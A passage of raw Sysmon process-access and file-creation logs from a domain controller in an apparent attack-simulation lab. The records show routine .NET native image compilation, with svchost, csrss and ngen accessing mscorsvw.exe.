9\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005920Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:43.007{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4566-6000-BD01-000000009A01}4336C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005941Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:44.992{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4568-6000-C401-000000009A01}4716C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005940Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:44.992{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4568-6000-C401-000000009A01}4716C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005939Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:44.945{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4568-6000-C301-000000009A01}4312C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005938Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:44.929{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4568-6000-C301-000000009A01}4312C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005937Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:44.929{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4568-6000-C301-000000009A01}4312C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005936Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:44.867{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4568-6000-C201-000000009A01}4676C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005935Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:44.851{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4568-6000-C201-000000009A01}4676C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005934Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:44.851{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4568-6000-C201-000000009A01}4676C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005933Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:44.773{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4568-6000-C101-000000009A01}4408C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005932Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:44.757{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4568-6000-C101-000000009A01}4408C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005931Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:44.757{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4568-6000-C101-000000009A01}4408C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005930Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:44.726{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4568-6000-C001-000000009A01}4576C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005929Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:44.710{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4568-6000-C001-000000009A01}4576C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005928Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:44.710{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4568-6000-C001-000000009A01}4576C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005927Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:21:44.617{08A6967A-4567-6000-BF01-000000009A01}4004C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\fa4-0\Microsoft.Internal.Tasks.Dataflow.dll2021-01-14 13:21:44.617 10341000x80000000000000005966Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:45.929{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4569-6000-CC01-000000009A01}2200C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005965Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:45.914{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4569-6000-CC01-000000009A01}2200C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005964Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:45.914{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4569-6000-CC01-000000009A01}2200C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005963Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:45.507{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4569-6000-CB01-000000009A01}3040C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005962Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:45.492{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4569-6000-CB01-000000009A01}3040C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005961Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:45.492{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4569-6000-CB01-000000009A01}3040C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005960Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:45.445{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4569-6000-CA01-000000009A01}4172C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005959Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:45.414{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4569-6000-CA01-000000009A01}4172C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005958Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 